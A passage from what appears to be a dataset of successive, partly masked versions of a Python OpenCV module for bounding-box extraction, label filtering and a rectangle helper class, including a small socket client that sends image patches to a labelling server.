rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\n<mask token>\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\n<mask token>\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled, margins)\n boxes.append(box)\n return boxes\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\n<mask token>\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\n<mask token>\n\n\ndef killSmallLables(frame, threshold=150):\n initial_weights = np.array([np.sum(frame == lable) for lable in range(\n np.amax(frame) + 1)])\n final_probs = initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n return frame\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef find_bounding_boxes(fimage, lables):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled)\n boxes.append(box)\n return boxes\n\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled, margins)\n boxes.append(box)\n return boxes\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef weightFilterMini(image, weight):\n image = np.uint8(image)\n image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2\n .CHAIN_APPROX_SIMPLE)\n final_contours = []\n for cnt in contours:\n if cv2.contourArea(cnt) >= weight:\n final_contours.append(cnt)\n fimage = np.zeros(image.shape[:2], np.uint8)\n cv2.drawContours(fimage, final_contours, -1, 255, -1)\n boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.\n boundingRect(cnt) for cnt in final_contours]))\n return fimage, boxes\n\n\ndef weightFilterMargined(image, lables, weight, margins):\n max = 0\n weights = np.zeros(lables)\n fimage = np.zeros_like(image)\n retained_lables = []\n for i in range(lables):\n weights[i] = np.sum(np.sum(image == i))\n if weights[i] > weights[max]:\n max = i\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n fimage -= np.uint8(image == max)\n fimage = np.uint8(fimage * 255)\n boxes = []\n if len(retained_lables) > 0:\n retained_lables.remove(max)\n boxes = find_margined_bounding_boxes(image.copy(), retained_lables,\n margins)\n return fimage, boxes\n\n\ndef calculatePossiblePadding(box, shape, default=20):\n w_pad = default\n h_pad = default\n if default == 0:\n rbox = RBox.fromPointBoundingBox(box)\n w_pad = round(0.205 * rbox.w)\n h_pad = round(0.205 * rbox.h)\n height, width = shape[0:2]\n (x_start, y_start), (x_end, y_end) = box\n pad_x_start = h_pad\n if y_start - pad_x_start < 0:\n pad_x_start = y_start\n pad_y_start = w_pad\n if x_start - pad_y_start < 0:\n pad_y_start = x_start\n pad_x_end = w_pad\n if y_end + pad_x_end >= height:\n pad_x_end = height - y_end - 1\n pad_y_end = h_pad\n if x_end + pad_y_end >= width:\n pad_y_end = width - x_end - 1\n return pad_x_start, pad_x_end, pad_y_start, pad_y_end\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\ndef drawBoundingBox(im, start, end, color):\n cv2.rectangle(im, start, end, color, 1)\n\n\n<mask token>\n\n\ndef extractPatch(im, box):\n x1, x2, y1, y2 = box\n return im[x1:x2, y1:y2, :]\n\n\ndef randomColor():\n return np.random.randint(0, 255, (1, 3))[0].tolist()\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\ndef killDyingLables(frame, mask, threshold=0.5):\n initial_weights = np.array([np.sum(frame == lable) for lable in range(\n np.amax(frame) + 1)]) + 1e-05\n labled_frame = frame * mask\n final_weights = np.array([np.sum(labled_frame == lable) for lable in\n range(np.amax(frame) + 1)])\n final_probs = final_weights / initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n labled_frame -= np.uint8((labled_frame == lable) * lable)\n return labled_frame\n\n\ndef killSmallLables(frame, threshold=150):\n initial_weights = np.array([np.sum(frame == lable) for lable in range(\n np.amax(frame) + 1)])\n final_probs = initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n return frame\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\ndef askForLable(patch):\n cv2.imwrite('patch.jpg', patch)\n clientSock = socket(AF_INET, SOCK_STREAM)\n clientSock.connect((TCP_IP, TCP_PORT))\n image = open('patch.jpg', 'rb')\n data = image.read(BUFFER_SIZE)\n while data:\n clientSock.send(data)\n data = image.read(BUFFER_SIZE)\n image.close()\n clientSock.shutdown(SHUT_WR)\n label = clientSock.recv(1024)\n label = label.decode('utf-8')\n return label\n",
"step-5": "import numpy as np\nimport cv2\nfrom pixcel import *\nfrom scipy import ndimage\nimport math\nfrom socket import *\nfrom config import *\nfrom time import time\n\n\ndef find_bounding_boxes(fimage, lables):\n\n # initialize boxes array\n boxes = []\n\n for lable in lables:\n\n # iterate all lables\n\n # filter out image pixels with current lable\n labled = (fimage == lable) + 0\n\n # find indexes\n box = find_bounding_box(labled)\n\n # append found bouding box\n boxes.append(box)\n\n return boxes\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n\n # initialize boxes array\n boxes = []\n\n for lable in lables:\n\n # iterate all lables\n\n # filter out image pixels with current lable\n labled = (fimage == lable) + 0\n\n # find indexes\n box = find_bounding_box(labled, margins)\n\n # append found bouding box\n boxes.append(box)\n\n return boxes\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n\n # extract indexes of foreground pixels\n indicies = np.array(np.nonzero(binary_matrix + 0))\n\n # get contours\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n\n # return contours\n return [(xs, ys), (xe, ye)]\n\ndef weightFilter(image, lables, weight):\n\n max = 0\n\n weights = np.zeros((lables))\n\n fimage = np.zeros_like(image)\n\n retained_lables = []\n\n for i in range(lables):\n weights[i] = np.sum(np.sum(image == i))\n\n if weights[i] > weights[max]:\n max = i\n\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n\n fimage -= np.uint8((image == max) + 0)\n\n fimage = np.uint8(fimage * 255)\n\n boxes = []\n\n if (len(retained_lables) > 0):\n\n retained_lables.remove(max)\n boxes = find_bounding_boxes(image.copy(), retained_lables)\n\n return fimage, boxes\n\n\ndef weightFilterMini(image, weight):\n\n image = np.uint8(image)\n # extract contours\n image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n final_contours = []\n\n for cnt in contours:\n\n if cv2.contourArea(cnt) >= weight:\n\n # add it to final_contours\n final_contours.append(cnt)\n\n fimage = np.zeros((image.shape[:2]), np.uint8)\n cv2.drawContours(fimage, final_contours, -1, 255, -1)\n\n boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.boundingRect(cnt) for cnt in final_contours]))\n\n return fimage, boxes\n\ndef weightFilterMargined(image, lables, weight, margins):\n max = 0\n\n weights = np.zeros((lables))\n\n fimage = np.zeros_like(image)\n\n retained_lables = []\n\n for i in range(lables):\n\n weights[i] = np.sum(np.sum(image == i))\n\n if weights[i] > weights[max]:\n max = i\n\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n\n fimage -= np.uint8(image == max)\n\n fimage = np.uint8(fimage * 255)\n\n boxes = []\n\n if (len(retained_lables) > 0):\n retained_lables.remove(max)\n boxes = find_margined_bounding_boxes(image.copy(), retained_lables, margins)\n\n return fimage, boxes\n\ndef calculatePossiblePadding(box, shape, default = 20):\n\n w_pad = default\n h_pad = default\n\n # dynamic padding\n if default == 0:\n\n rbox = RBox.fromPointBoundingBox(box)\n w_pad = round(0.205 * rbox.w)\n h_pad = round(0.205 * rbox.h)\n\n # extract with and height from shape\n height, width = shape[0:2]\n\n # extract starting, ending x and y from box\n ((x_start, y_start), (x_end, y_end)) = box\n\n # check if is it possible to add certain padding\n # if not add possible padding for all 4 points\n pad_x_start = h_pad\n if y_start - pad_x_start < 0:\n pad_x_start = y_start\n\n pad_y_start = w_pad\n if x_start - pad_y_start < 0:\n pad_y_start = x_start\n\n pad_x_end = w_pad\n if y_end + pad_x_end >= height:\n pad_x_end = height - y_end - 1\n\n pad_y_end = h_pad\n if x_end + pad_y_end >= width:\n pad_y_end = width - x_end - 1\n\n # return resultant padding\n return pad_x_start, pad_x_end, pad_y_start, pad_y_end\n\n\ndef findConnectedComponents(frame, threshold = 150, blur_radius = 1.0):\n\n img = frame.copy() # gray-scale image\n\n # smooth the image (to remove small objects)\n imgf = ndimage.gaussian_filter(img, blur_radius)\n\n # find connected components\n labeled, nr_objects = ndimage.label(imgf > threshold)\n\n return labeled, nr_objects\n\n\ndef drawBoundingBox(im, start, end, color):\n cv2.rectangle(im, start, end, color, 1)\n\ndef pwpBasedTracking(image, frame_models, threshold):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))\n predicted = np.zeros((image.shape[0:2]), np.uint8)\n # FOREACH GIVEN PATCH AND ITS MODEL, APPLY MODEL TO PATCH\n for fm in frame_models:\n\n patch = extractPatch(image, fm[1])\n #patch = cv2.medianBlur(patch, 5)\n mask = np.zeros(patch.shape[0:2], np.uint8)\n res = applyModel(patch, mask, fm[0])\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)\n if(len(np.nonzero(res)[0]) > max(fm[2] * threshold, 10) ):\n predicted[fm[1][0]: fm[1][1], fm[1][2]: fm[1][3]] += res;\n\n return predicted\n\ndef extractPatch(im, box):\n\n # extract coordinates\n x1, x2, y1, y2 = box\n\n # extract and return patch\n return im[x1: x2, y1: y2, :]\n\ndef randomColor():\n\n return np.random.randint(0, 255, (1, 3))[0].tolist()\n\ndef performColorProcessing(image, mask, iterations = 1):\n\n # initialize kernel\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n\n return mask\n\ndef killDyingLables(frame, mask, threshold = 0.5):\n\n # get initial weights of lables\n initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)]) + 0.00001\n\n # get final labled frame\n labled_frame = frame * mask\n\n # get final weights\n final_weights = np.array([np.sum(labled_frame == lable) for lable in range(np.amax(frame) + 1)])\n\n # final probabilites\n final_probs = (final_weights/initial_weights) < threshold\n\n for lable in range(len(final_probs)):\n\n dying = final_probs[lable]\n\n # check is lable is dying\n if dying:\n\n # kill lable\n labled_frame -= np.uint8((labled_frame == lable) * lable)\n\n # return final labled frame\n return labled_frame\n\ndef killSmallLables(frame, threshold = 150):\n\n # get initial weights of lables\n initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)])\n\n # final probabilites\n final_probs = initial_weights < threshold\n\n for lable in range(len(final_probs)):\n\n dying = final_probs[lable]\n\n # check is lable is dying\n if dying:\n\n # kill lable\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n\n # return final labled frame\n return frame\n\nclass RBox:\n\n def __init__(self):\n\n # initialize atributes\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n\n # return rbox\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n\n # return rbox\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n\n # return rbox\n return rbox\n\n @staticmethod\n def 